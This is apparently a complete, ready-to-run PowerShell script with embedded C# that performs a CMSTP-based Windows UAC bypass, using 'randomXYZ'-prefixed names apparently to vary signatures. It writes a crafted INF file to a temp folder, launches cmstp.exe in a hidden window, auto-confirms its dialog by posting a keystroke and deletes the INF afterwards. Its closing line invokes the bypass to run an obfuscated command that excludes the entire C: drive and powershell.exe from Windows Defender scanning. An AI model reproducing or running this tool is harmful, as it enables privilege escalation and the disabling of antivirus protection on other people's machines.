function randomXYZ-Invoke-UAC {


param(
    [Parameter(Mandatory = $true)]
    [string]$randomXYZExecutable,
 
    [Parameter()]
    [string]$randomXYZCommand
)

$randomXYZInfData = @'
[version]
Signature=$chicago$
AdvancedINF=2.5

[DefaultInstall]
CustomDestination=randomXYZ-CustInstDestSectionAllUsers
RunPreSetupCommands=randomXYZ-RunPreSetupCommandsSection

[randomXYZ-RunPreSetupCommandsSection]
LINE
taskkill /IM cmstp.exe /F

[randomXYZ-CustInstDestSectionAllUsers]
49000,49001=randomXYZ-AllUSer_LDIDSection, 7

[randomXYZ-AllUSer_LDIDSection]
"HKLM", "SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\CMMGR32.EXE", "ProfileInstallPath", "%UnexpectedError%", ""

[Strings]
ServiceName="randomXYZVPN"
ShortSvcName="randomXYZVPN"
'@

$randomXYZCode = @"
using System;
using System.Threading;
using System.Text;
using System.IO;
using System.Diagnostics;
using System.ComponentModel;
using System.Runtime.InteropServices;

public class randomXYZCMSTPBypass
{
    [DllImport("Shell32.dll", CharSet = CharSet.Auto, SetLastError = true)]
    static extern IntPtr ShellExecute(IntPtr hwnd, string lpOperation, string lpFile, string lpParameters, string lpDirectory, int nShowCmd);

    [DllImport("user32.dll")]
    static extern IntPtr FindWindow(string lpClassName, string lpWindowName);

    [DllImport("user32.dll")]
    static extern bool PostMessage(IntPtr hWnd, uint Msg, int wParam, int lParam);

    public static string BinaryPath = "c:\\windows\\system32\\cmstp.exe";

    public static string SetInfFile(string CommandToExecute, string InfData)
    {
        StringBuilder OutputFile = new StringBuilder();
        OutputFile.Append("C:\\windows\\temp");
        OutputFile.Append("\\");
        OutputFile.Append(Path.GetRandomFileName().Split(Convert.ToChar("."))[0]);
        OutputFile.Append(".inf");
        StringBuilder newInfData = new StringBuilder(InfData);
        newInfData.Replace("LINE", CommandToExecute);
        File.WriteAllText(OutputFile.ToString(), newInfData.ToString());
        return OutputFile.ToString();
    }

    public static bool randomXYZExecute(string CommandToExecute, string InfData)
    {
        const int WM_SYSKEYDOWN = 0x0100;
        const int VK_RETURN = 0x0D;

        StringBuilder InfFile = new StringBuilder();
        InfFile.Append(SetInfFile(CommandToExecute, InfData));

        ProcessStartInfo startInfo = new ProcessStartInfo(BinaryPath);
        startInfo.Arguments = "/au " + InfFile.ToString();
        startInfo.WindowStyle = ProcessWindowStyle.Hidden;  // Hidden window
        IntPtr dptr = Marshal.AllocHGlobal(1);
        ShellExecute(dptr, "", BinaryPath, startInfo.Arguments, "", 0);

        Thread.Sleep(3000);
        IntPtr WindowToFind = FindWindow(null, "randomXYZVPN");

        PostMessage(WindowToFind, WM_SYSKEYDOWN, VK_RETURN, 0);
        Thread.Sleep(5000);
        File.Delete(InfFile.ToString());
        return true;
    }
}
"@

$randomXYZConsentPrompt = (Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System).ConsentPromptBehaviorAdmin
$randomXYZSecureDesktopPrompt = (Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System).PromptOnSecureDesktop
if ($randomXYZConsentPrompt -Eq 2 -and $randomXYZSecureDesktopPrompt -Eq 1) {
    return
}

try {
    $randomXYZUser = [System.Security.Principal.WindowsIdentity]::GetCurrent().Name
    $randomXYZAdm = Get-LocalGroupMember -SID S-1-5-32-544 | Where-Object { $_.Name -eq $randomXYZUser }
} catch {
    $randomXYZUser = [System.Security.Principal.WindowsIdentity]::GetCurrent().Name
    $randomXYZAdminGroupSID = 'S-1-5-32-544'
    $randomXYZAdminGroup = Get-WmiObject -Class Win32_Group | Where-Object { $_.SID -eq $randomXYZAdminGroupSID }
    $randomXYZMembers = $randomXYZAdminGroup.GetRelated("Win32_UserAccount")
    $randomXYZMembers | ForEach-Object { if ($_.Caption -eq $randomXYZUser) { $randomXYZAdm = $true } }
}

if (!$randomXYZAdm) {
    return
}

try {
    if (![System.IO.File]::Exists($randomXYZExecutable)) {
        $randomXYZEx = (Get-Command $randomXYZExecutable)
        if (![System.IO.File]::Exists($randomXYZEx.Source)) {
            $randomXYZExecutable = $ExecutionContext.SessionState.Path.GetUnresolvedProviderPathFromPSPath($randomXYZExecutable)
            if (![System.IO.File]::Exists($randomXYZExecutable)) {
                return
            }
        } else {
            $randomXYZExecutable = (Get-Command $randomXYZExecutable).Name
        }
    }
} catch {
    return
}

if ($randomXYZExecutable.Contains("powershell")) {
    if ($randomXYZCommand -ne "") {
        $randomXYZFinal = "powershell -WindowStyle Hidden -c ""$randomXYZCommand"""
    } else {
        $randomXYZFinal = "$randomXYZExecutable $randomXYZCommand"
    }
} elseif ($randomXYZExecutable.Contains("cmd")) {
    if ($randomXYZCommand -ne "") {
        $randomXYZFinal = "cmd /c ""$randomXYZCommand"""  # Changed to /c to close the cmd window
    } else {
        $randomXYZFinal = "$randomXYZExecutable $randomXYZCommand"
    }
} else {
    $randomXYZFinal = "$randomXYZExecutable $randomXYZCommand"
}

function randomXYZExecute {
    try {
        $randomXYZResult = [randomXYZCMSTPBypass]::randomXYZExecute($randomXYZFinal, $randomXYZInfData)
    } catch {
        Add-Type $randomXYZCode
        $randomXYZResult = [randomXYZCMSTPBypass]::randomXYZExecute($randomXYZFinal, $randomXYZInfData)
    }

    if ($randomXYZResult) {
        return
    } else {
        return
    }
}

$randomXYZProcess = ((Get-WmiObject -Class win32_process).name | Select-String "cmstp" | Select-Object * -First 1).Pattern
if ($randomXYZProcess -eq "cmstp") {
    try {
        Stop-Process -Name "cmstp" -Force
        randomXYZExecute
    } catch {
        return
    }
} else {
    randomXYZExecute
}
}

# Function Call
randomXYZ-Invoke-UAC -randomXYZExecutable "powershell" -randomXYZCommand ".('Add-MpP' + 'reference') -ExclusionPath C:\ -ExclusionProcess powershell.exe"